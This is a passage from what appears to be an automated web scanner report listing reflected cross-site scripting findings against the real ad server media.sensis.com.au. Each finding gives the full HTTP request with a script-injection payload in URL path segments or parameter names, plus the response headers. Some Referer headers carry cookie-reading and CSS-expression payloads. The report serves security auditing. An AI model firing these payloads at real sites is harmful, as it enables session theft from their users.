GET /hserver1d7cf"><script>alert(1)</script>4810e0e86c5/acc_random=88809400300/SITE=3RD.BPPROMO.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=300x70/POSITION=2/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=122954556302 HTTP/1.1 Host: media.sensis.com.au Proxy-Connection: keep-alive Referer: http://www.virtualmedicalcentre.com/?21bba%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E10e5e8898c1=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+38lAhp4+5M51004+5
Response
HTTP/1.1 200 OK Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86) Date: Tue, 23 Nov 2010 03:12:44 GMT X-DirectServer: DS1 Content-Type: text/html Content-Length: 510 Pragma: no-cache Cache-control: no-cache P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC" Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dd602"><script>alert(1)</script>a3aedddad14 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hserver/acc_randomdd602"><script>alert(1)</script>a3aedddad14=88809400300/SITE=3RD.BPPROMO.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=300x70/POSITION=2/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=122954556302 HTTP/1.1 Host: media.sensis.com.au Proxy-Connection: keep-alive Referer: http://www.virtualmedicalcentre.com/?21bba%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E10e5e8898c1=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+38lAhp4+5M51004+5
Response
HTTP/1.1 200 OK Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86) Date: Tue, 23 Nov 2010 03:12:45 GMT X-DirectServer: DS2 Content-Type: text/html Content-Length: 510 Pragma: no-cache Cache-control: no-cache P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC" Connection: close
2.660. http://media.sensis.com.au/hserver/acc_random=88809400300/SITE=3RD.BPPROMO.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=300x70/POSITION=2/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=122954556302 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4b786"><script>alert(1)</script>0182aa35b97 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hserver/acc_random=88809400300/SITE=3RD.BPPROMO.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=300x70/POSITION=2/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=122954556302?4b786"><script>alert(1)</script>0182aa35b97=1 HTTP/1.1 Host: media.sensis.com.au Proxy-Connection: keep-alive Referer: http://www.virtualmedicalcentre.com/?21bba%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E10e5e8898c1=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+38lAhp4+5M51004+5
Response
HTTP/1.1 200 OK Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86) Date: Tue, 23 Nov 2010 03:12:42 GMT X-DirectServer: DS3 Content-Type: text/html Content-Length: 513 Pragma: no-cache Cache-control: no-cache P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC" Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 34243"><script>alert(1)</script>6d116edc05 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hserver34243"><script>alert(1)</script>6d116edc05/acc_random=898889930597/SITE=TEL.BIGPOND.MUSIC.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.MUSIC.HOME/AAMSZ=100x29/POSITION=headernav/pageid=369648929007 HTTP/1.1 Host: media.sensis.com.au Proxy-Connection: keep-alive Referer: http://bigpondmusic.com/bphf/header/adh.html Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+38lAhp4+5M51004+5
Response
HTTP/1.1 200 OK Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86) Date: Tue, 23 Nov 2010 03:12:47 GMT X-DirectServer: DS5 Content-Type: text/html Content-Length: 470 Pragma: no-cache Cache-control: no-cache P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC" Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7a555"><script>alert(1)</script>7e8109175e0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hserver/acc_random7a555"><script>alert(1)</script>7e8109175e0=898889930597/SITE=TEL.BIGPOND.MUSIC.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.MUSIC.HOME/AAMSZ=100x29/POSITION=headernav/pageid=369648929007 HTTP/1.1 Host: media.sensis.com.au Proxy-Connection: keep-alive Referer: http://bigpondmusic.com/bphf/header/adh.html Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+38lAhp4+5M51004+5
Response
HTTP/1.1 200 OK Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86) Date: Tue, 23 Nov 2010 03:12:48 GMT X-DirectServer: DS1 Content-Type: text/html Content-Length: 479 Pragma: no-cache Cache-control: no-cache P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC" Connection: close
2.663. http://media.sensis.com.au/hserver/acc_random=898889930597/SITE=TEL.BIGPOND.MUSIC.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.MUSIC.HOME/AAMSZ=100x29/POSITION=headernav/pageid=369648929007 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8beb9"><script>alert(1)</script>9c3d5ee6454 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hserver/acc_random=898889930597/SITE=TEL.BIGPOND.MUSIC.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.MUSIC.HOME/AAMSZ=100x29/POSITION=headernav/pageid=369648929007?8beb9"><script>alert(1)</script>9c3d5ee6454=1 HTTP/1.1 Host: media.sensis.com.au Proxy-Connection: keep-alive Referer: http://bigpondmusic.com/bphf/header/adh.html Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+38lAhp4+5M51004+5
Response
HTTP/1.1 200 OK Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86) Date: Tue, 23 Nov 2010 03:12:46 GMT X-DirectServer: DS5 Content-Type: text/html Content-Length: 474 Pragma: no-cache Cache-control: no-cache P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC" Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 629f3"><script>alert(1)</script>3010571870b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86) Date: Tue, 23 Nov 2010 03:12:45 GMT X-DirectServer: DS2 Content-Type: text/html Content-Length: 375 Pragma: no-cache Cache-control: no-cache Set-Cookie: GUID=FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF; expires=Sun, 29-Feb-2012 23:59:59 GMT; path=/; P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC" Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bf187"><script>alert(1)</script>bf9bd5f41cd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86) Date: Tue, 23 Nov 2010 03:12:46 GMT X-DirectServer: DS2 Content-Type: text/html Content-Length: 375 Pragma: no-cache Cache-control: no-cache Set-Cookie: GUID=FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF; expires=Sun, 29-Feb-2012 23:59:59 GMT; path=/; P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC" Connection: close
2.666. http://media.sensis.com.au/hserver/acc_random=928099946176/SITE=TEL.BIGPOND.MUSIC.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.MUSIC.HOME/AAMSZ=1x1/POSITION=BLW1/pageid=942103891691 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 871ea"><script>alert(1)</script>5afab616603 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86) Date: Tue, 23 Nov 2010 03:12:44 GMT X-DirectServer: DS2 Content-Type: text/html Content-Length: 378 Pragma: no-cache Cache-control: no-cache Set-Cookie: GUID=FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF; expires=Sun, 29-Feb-2012 23:59:59 GMT; path=/; P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC" Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 76fb8"><script>alert(1)</script>faec95ef93 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hserver76fb8"><script>alert(1)</script>faec95ef93/acc_random=937599525359/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.OTHER/AAMSZ=100x29/POSITION=headernav/pageid=164173303778 HTTP/1.1 Host: media.sensis.com.au Proxy-Connection: keep-alive Referer: http://bigpondvideo.com/bphf/header/adh.html Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+38lAhp4+5M51004+5; LE2=mkowC1+5a8+31+5
Response
HTTP/1.1 200 OK Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86) Date: Tue, 23 Nov 2010 03:12:51 GMT X-DirectServer: DS1 Content-Type: text/html Content-Length: 474 Pragma: no-cache Cache-control: no-cache P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC" Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 71998"><script>alert(1)</script>8939c80793 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hserver/acc_random71998"><script>alert(1)</script>8939c80793=937599525359/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.OTHER/AAMSZ=100x29/POSITION=headernav/pageid=164173303778 HTTP/1.1 Host: media.sensis.com.au Proxy-Connection: keep-alive Referer: http://bigpondvideo.com/bphf/header/adh.html Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+38lAhp4+5M51004+5; LE2=mkowC1+5a8+31+5
Response
HTTP/1.1 200 OK Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86) Date: Tue, 23 Nov 2010 03:12:52 GMT X-DirectServer: DS5 Content-Type: text/html Content-Length: 668 Pragma: no-cache Cache-control: no-cache P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC" Connection: close
2.669. http://media.sensis.com.au/hserver/acc_random=937599525359/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.OTHER/AAMSZ=100x29/POSITION=headernav/pageid=164173303778 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 65fc7"><script>alert(1)</script>5335895e23 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hserver/acc_random=937599525359/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.OTHER/AAMSZ=100x29/POSITION=headernav/pageid=164173303778?65fc7"><script>alert(1)</script>5335895e23=1 HTTP/1.1 Host: media.sensis.com.au Proxy-Connection: keep-alive Referer: http://bigpondvideo.com/bphf/header/adh.html Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+38lAhp4+5M51004+5; LE2=mkowC1+5a8+31+5
Response
HTTP/1.1 200 OK Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86) Date: Tue, 23 Nov 2010 03:12:50 GMT X-DirectServer: DS3 Content-Type: text/html Content-Length: 695 Pragma: no-cache Cache-control: no-cache P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC" Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 115a1"><script>alert(1)</script>5597740ebe0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hserver115a1"><script>alert(1)</script>5597740ebe0/acc_random=954878050949/SITE=TEL.BIGPOND.MUSIC.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.MUSIC.HOME/AAMSZ=300x70/POSITION=BLW1/pageid=369648929007 HTTP/1.1 Host: media.sensis.com.au Proxy-Connection: keep-alive Referer: http://bigpondmusic.com/?7c8ab%22style%3d%22x%3aexpression(alert(1))%2227f2f63ab70=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+38lAhp4+5M51004+5
Response
HTTP/1.1 200 OK Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86) Date: Tue, 23 Nov 2010 03:12:51 GMT X-DirectServer: DS5 Content-Type: text/html Content-Length: 432 Pragma: no-cache Cache-control: no-cache P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC" Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 85803"><script>alert(1)</script>008a71f181d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hserver/acc_random85803"><script>alert(1)</script>008a71f181d=954878050949/SITE=TEL.BIGPOND.MUSIC.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.MUSIC.HOME/AAMSZ=300x70/POSITION=BLW1/pageid=369648929007 HTTP/1.1 Host: media.sensis.com.au Proxy-Connection: keep-alive Referer: http://bigpondmusic.com/?7c8ab%22style%3d%22x%3aexpression(alert(1))%2227f2f63ab70=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+38lAhp4+5M51004+5
Response
HTTP/1.1 200 OK Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86) Date: Tue, 23 Nov 2010 03:12:52 GMT X-DirectServer: DS2 Content-Type: text/html Content-Length: 432 Pragma: no-cache Cache-control: no-cache P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC" Connection: close
2.672. http://media.sensis.com.au/hserver/acc_random=954878050949/SITE=TEL.BIGPOND.MUSIC.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.MUSIC.HOME/AAMSZ=300x70/POSITION=BLW1/pageid=369648929007 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b3255"><script>alert(1)</script>8ee6d667942 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hserver/acc_random=954878050949/SITE=TEL.BIGPOND.MUSIC.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.MUSIC.HOME/AAMSZ=300x70/POSITION=BLW1/pageid=369648929007?b3255"><script>alert(1)</script>8ee6d667942=1 HTTP/1.1 Host: media.sensis.com.au Proxy-Connection: keep-alive Referer: http://bigpondmusic.com/?7c8ab%22style%3d%22x%3aexpression(alert(1))%2227f2f63ab70=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+38lAhp4+5M51004+5
Response
HTTP/1.1 200 OK Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86) Date: Tue, 23 Nov 2010 03:12:50 GMT X-DirectServer: DS3 Content-Type: text/html Content-Length: 435 Pragma: no-cache Cache-control: no-cache P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC" Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 57843"><script>alert(1)</script>864e77fc105 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hserver57843"><script>alert(1)</script>864e77fc105/acc_random=955810753905/SITE=TEL.BIGPOND.GAMEARENA.GAMING/AREA=ENTERTAINMENT.BIGPOND.GAMING.GAMEARENA.ALLPLATFORMS.NEWS/AAMSZ=100x29/POSITION=headernav/pageid=260571614373 HTTP/1.1 Host: media.sensis.com.au Proxy-Connection: keep-alive Referer: http://www.gamearena.com.au/bphf/header/adh.html Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+38lAhp4+5M51004+5; LE2=mkowC1+5a8+31+5
Response
HTTP/1.1 200 OK Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86) Date: Tue, 23 Nov 2010 03:12:55 GMT X-DirectServer: DS5 Content-Type: text/html Content-Length: 470 Pragma: no-cache Cache-control: no-cache P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC" Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b17b5"><script>alert(1)</script>2df4f010c0e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hserver/acc_randomb17b5"><script>alert(1)</script>2df4f010c0e=955810753905/SITE=TEL.BIGPOND.GAMEARENA.GAMING/AREA=ENTERTAINMENT.BIGPOND.GAMING.GAMEARENA.ALLPLATFORMS.NEWS/AAMSZ=100x29/POSITION=headernav/pageid=260571614373 HTTP/1.1 Host: media.sensis.com.au Proxy-Connection: keep-alive Referer: http://www.gamearena.com.au/bphf/header/adh.html Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+38lAhp4+5M51004+5; LE2=mkowC1+5a8+31+5
Response
HTTP/1.1 200 OK Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86) Date: Tue, 23 Nov 2010 03:12:57 GMT X-DirectServer: DS2 Content-Type: text/html Content-Length: 2506 Pragma: no-cache Cache-control: no-cache P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC" Connection: close
2.675. http://media.sensis.com.au/hserver/acc_random=955810753905/SITE=TEL.BIGPOND.GAMEARENA.GAMING/AREA=ENTERTAINMENT.BIGPOND.GAMING.GAMEARENA.ALLPLATFORMS.NEWS/AAMSZ=100x29/POSITION=headernav/pageid=260571614373 [name of an arbitrarily supplied request parameter]previousnext
